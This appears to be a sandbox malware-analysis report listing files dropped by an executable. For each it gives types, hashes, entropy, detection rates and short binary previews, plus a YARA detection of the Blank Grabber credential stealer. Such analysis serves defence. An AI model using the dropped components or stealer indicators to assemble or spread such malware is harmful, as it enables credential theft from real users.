                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:BN6akbHvkpgRFeTWraC/YAapucnbp9b8I1Lw5Bqd5YiSyvFqMgAMxkE1Ei:B8akHrRFeTWrRtcnjb8I1Lw5BqD7Sy9C
                                                                                                                                                                                                                              MD5:DA0DC29C413DFB5646D3D0818D875571
                                                                                                                                                                                                                              SHA1:ADCD7ECD1581BCD0DA48BD7A34FECCADA0B015D6
                                                                                                                                                                                                                              SHA-256:C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8
                                                                                                                                                                                                                              SHA-512:17A0C09E2E18A984FD8FC4861397A5BD4692BCD3B66679255D74BB200EE9258FB4677B36D1EAA4BD650D84E54D18B8D95A05B34D0484BD9D8A2B6AB36FFFFCDB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):59160
                                                                                                                                                                                                                              Entropy (8bit):7.856604012993883
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:e063sNIsNgSIOB2nMCbGV5SQpvX8bpJdRdTJq6I1OQJ+7Sy5/x19:eLHr4VD7dv81JdRdTJfI1OQJ+X9
                                                                                                                                                                                                                              MD5:5F31F58583D2D1F7CB54DB8C777D2B1E
                                                                                                                                                                                                                              SHA1:494587D2B9E993F2E5398D1C745732EF950E43B6
                                                                                                                                                                                                                              SHA-256:FAD9FFCD3002CEC44C3DA9D7D48CE890D6697C0384B4C7DACAB032B42A5AC186
                                                                                                                                                                                                                              SHA-512:8A4EC67D7AD552E8ADEA629151665F6832FC77C5D224E0EEFE90E3AEC62364A7C3D7D379A6D7B91DE0F9E48AF14F166E3B156B4994AFE7879328E0796201C8EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d......f.........." ...(.........p..`........................................@............`..........................................;..P....9.......0..........D............;......................................`&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):67864
                                                                                                                                                                                                                              Entropy (8bit):7.846380784128584
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:ZF/9oW45eDk06nzOYL/arLU5fTWPLYuDmrFI1C7S1U7SyfoxS:Lv45eDH6yYL/QETWTY3BI1C7SmFd
                                                                                                                                                                                                                              MD5:E33BF2BC6C19BF37C3CC8BAC6843D886
                                                                                                                                                                                                                              SHA1:6701A61D74F50213B141861CFD169452DDE22655
                                                                                                                                                                                                                              SHA-256:E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288
                                                                                                                                                                                                                              SHA-512:3526BCB97AD34F2E0C6894EE4CD6A945116F8AF5C20C5807B9BE877EB6EA9F20E571610D30D3E3B7391B23DDCD407912232796794277A3C4545CBCB2C5F8ED6F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.........@.......P...................................0............`.........................................l,..d....)....... ..........P............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1332769
                                                                                                                                                                                                                              Entropy (8bit):5.586560217717372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:VHlJGUqQlLmgBvc+fYNXPh26UZWAzyX7j7YQqPQCxi2hdmSPpHg1d6R1RbtRwv6:VHlJGUDa+zy/7UlZhdmSPNaQHtRwv6
                                                                                                                                                                                                                              MD5:48BA559BF70C3EF963F86633530667D6
                                                                                                                                                                                                                              SHA1:E3319E3A70590767AD00290230D77158F8F8307E
                                                                                                                                                                                                                              SHA-256:F8377AA03B7036E7735E2814452C1759AB7CEEC3F8F8A202B697B4132809CE5E
                                                                                                                                                                                                                              SHA-512:567A7BEF4A7C7FF0890708C0E62D2AF748B645C8B9071953873B0DD5AA789C42796860896A6B5E539651DE9A2243338E2A5FB47743C30DFCDE59B1787C4C1871
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK..........!./gJ.O...O......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119273
                                                                                                                                                                                                                              Entropy (8bit):7.680998224539325
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:C9JWlPltDYDAMaUOIq5MYzHR05w9G6yyGZwbQGQXZSCDlhLxveiZUYEwCKpx:bEEMPWbHaB6NGmEtwa2Y1
                                                                                                                                                                                                                              MD5:8CC6E7F8574FD30522EAB0EE12CEA595
                                                                                                                                                                                                                              SHA1:9B3EF4E08B655E5464930FA80C6F859E79315AEB
                                                                                                                                                                                                                              SHA-256:36C838F538976679170F3D3C99DBA733D9B9F8D49F731E1793FC70D528577638
                                                                                                                                                                                                                              SHA-512:F66B637F369744F0C9C417A72325F4057B4F553D878CAE0005047C97C536A5EE4CFBC066E4D484E21D180D53D8D89B5F02DFB51E53FD506C1C48CE585B37FA5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:PK........7u.Y|Q..s...s.......stub-o.pyc.........H.f.*...............................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39512
                                                                                                                                                                                                                              Entropy (8bit):7.992601002974843
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:768:B5IFWxpEDUCrfDJx4A+nUYqcF5J42pTOpOslLCf4IUrkTx6VZH2Iq8:BWFWxpFCTgA+nUYqc3GyTOpOslLCf3U/
                                                                                                                                                                                                                              MD5:3B38052473B872EAB684CF501BDFBD40
                                                                                                                                                                                                                              SHA1:AB63DCE22A6023A623040D6C8E8949296CBB33C9
                                                                                                                                                                                                                              SHA-256:807E211F1D6C83B2635FD5231F75526E1D864CC3659360C091DF6EB07F86D0A4
                                                                                                                                                                                                                              SHA-512:1A28F0CCE1C9A8B4673C8FA0EC9B83A034A39DAE5A966A958957D7D5E59057DA92C3A375135D49F2BFB9DDAF0D60E880C4F09B15B9640057E4FDFFDC2263089D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:..=[....|*......m..,.*.!.y8.OD.R./.t~.v'.=5.x.#..i..7-...V.w:..-F..;f.....k..'..;e..`....I]-u`.X..L......+-...(.y..._.E....1.Q..o...nl..z.j..A......U.....i....A.5.f.....w\[.{f....#.........W..f....v.6....[.....c[...l.....0\5....%.i.G....r...O....<~9.sM....>./.......\h.u....q.<.Nv..V.d....V..E...i......w...YX?...Ib.l...S.A.G....(.N.wy[..$....`*Z.l.<.?e...B.....g...?./.b..p...#..f../.p/|.R.^..{..M/.oc...a.azR.Y.^8.;.......+.....D].....W......:*m..I..)[V.R&..........._........!:.ED.._D...H.w.)...Lu_../.Z........N8=.)..4s.EYq...Z......D.\...<.z.*.x...l/.H....A.....L..fH..k...~D.l.{.\.....[plCa....$..q.4!C.....l.!.)!.H....4....o.I].47..M...2.2M.8..l....%.n."..I..T.!.....m..{.....1{...=..<v".>eE.7C.;..Z.4.+...S_.....2..a......$..pS.`H9d{>....)nL.@.=..X...h..y.XF...x2..S....-...b4.y.l.|..[..LM(a.[.}..../wA..j.L2.). ..A.8R.W.FW....B.4.z.9;..c.....j..]T/.]......_...{s.0B...A....iz.+@..=.P.. ............J..<DF.9n..~."P.>...z...k...
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1635096
                                                                                                                                                                                                                              Entropy (8bit):7.95287803315892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                                                                                                                                                                                              MD5:7F1B899D2015164AB951D04EBB91E9AC
                                                                                                                                                                                                                              SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
                                                                                                                                                                                                                              SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
                                                                                                                                                                                                                              SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29968
                                                                                                                                                                                                                              Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                              MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                              SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                              SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                              SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):228120
                                                                                                                                                                                                                              Entropy (8bit):7.928688904391487
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
                                                                                                                                                                                                                              MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
                                                                                                                                                                                                                              SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
                                                                                                                                                                                                                              SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
                                                                                                                                                                                                                              SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1809176
                                                                                                                                                                                                                              Entropy (8bit):7.993595793951616
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:49152:Ef2ZN5YIMku2u+Nh2bgCuBa2PB3lF3gKqKPZGL:EuZfW2u+N81YDPB3nXy
                                                                                                                                                                                                                              MD5:EB02B8268D6EA28DB0EA71BFE24B15D6
                                                                                                                                                                                                                              SHA1:86F723FCC4583D7D2BD59CA2749D4B3952CD65A5
                                                                                                                                                                                                                              SHA-256:80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70
                                                                                                                                                                                                                              SHA-512:693BBC3C896AD3C6044C832597F946C778E6C6192DEF3D662803E330209EC1C68D8D33BD82978279AE66B264A892A366183DCEF9A3A777E0A6EE450A928268E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..........P..[k...P..................................Pl...........`.........................................H.k.d....yk......pk......._.`I...........Ll. ............................gk.(....gk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26392
                                                                                                                                                                                                                              Entropy (8bit):7.471120785534753
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:VGXeQMA/KHhhtpoDeI1QGcq5YiSyvXAMxkEm:VBA/KHhhwDeI1QGco7Syfxq
                                                                                                                                                                                                                              MD5:33722C8CD45091D31AEF81D8A1B72FA8
                                                                                                                                                                                                                              SHA1:E9043D440235D244FF9934E9694C5550CAE2D5AB
                                                                                                                                                                                                                              SHA-256:366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12
                                                                                                                                                                                                                              SHA-512:74217ABEC2727BAAA5138E1B1C4BAC7D0CA574CF5A377396FC1CA0D3C07BEB8AAA374E8060D2B5F707426312C11E0A34527EE0190E979E996F3B822EFA24852F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 2%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.0..........0.....................................................`......................................... ...L....................`..............l.......................................@...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):660248
                                                                                                                                                                                                                              Entropy (8bit):7.9932751689375285
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:12288:CjFc9XUn2iq3Z7tTogf3AKuApDVPXyHaDRtIRqMo4UE0AzcNzeMbziw:398qt37rXy6N60MolE0scNrp
                                                                                                                                                                                                                              MD5:68B435A35F9DCBC10B3CD4B30977B0BD
                                                                                                                                                                                                                              SHA1:9726EF574CA9BDA8EC9AB85A5B97ADCDF148A41F
                                                                                                                                                                                                                              SHA-256:240D6D3EFAC25AF08FE41A60E181F8FDCB6F95DA53B3FAD54B0F96680E7A8277
                                                                                                                                                                                                                              SHA-512:8E133B72BD3776F961258793C2B82D2CD536C7AE0ED0241DAA2F67D90A6968F563B72F74A1C33D9BDFB821B796612FAA7A73A712369FF3B36D968E57BFCDD793
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........tB..,...,...,..m....,.D.-...,.D./...,.D.(...,.D.)...,..m-...,...-...,...$...,...,...,......,.......,.Rich..,.........PE..d......f.........." ...(.....0............................................................`..............................................#.......................................................................... ...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\sB2ClgrGng.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):303384
                                                                                                                                                                                                                              Entropy (8bit):7.98532051715837
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:PuQ0qZzMWlZe6+dTxmH1wne4P7dK5H4lT3yfd6o0VSi2Erk8BnJ1Ah:PuQ0wAWlc6+dg1wb7/82UUrk8BnJ1Ah
                                                                                                                                                                                                                              MD5:6DD43E115402D9E1C7CD6F21D47CFCF5
                                                                                                                                                                                                                              SHA1:C7FB8F33F25B0B75FC05EF0785622AA4EC09503C
                                                                                                                                                                                                                              SHA-256:2A00F41BBC3680807042FC258F63519105220053FB2773E7D35480515FAD9233
                                                                                                                                                                                                                              SHA-512:72E266EB1CE5CBBCFD1D2A6F864538EFD80B3ED844E003E2BD9566708FEE0919447290A3B559EA27C32794F97A629A8FE8FC879654FFA609FCA5C053DAC70C69
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.`....... .......0................................................`.............................................X....................@..........................................................@...........................................UPX0..... ..............................UPX1.....`...0...`..................@....rsrc................d..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
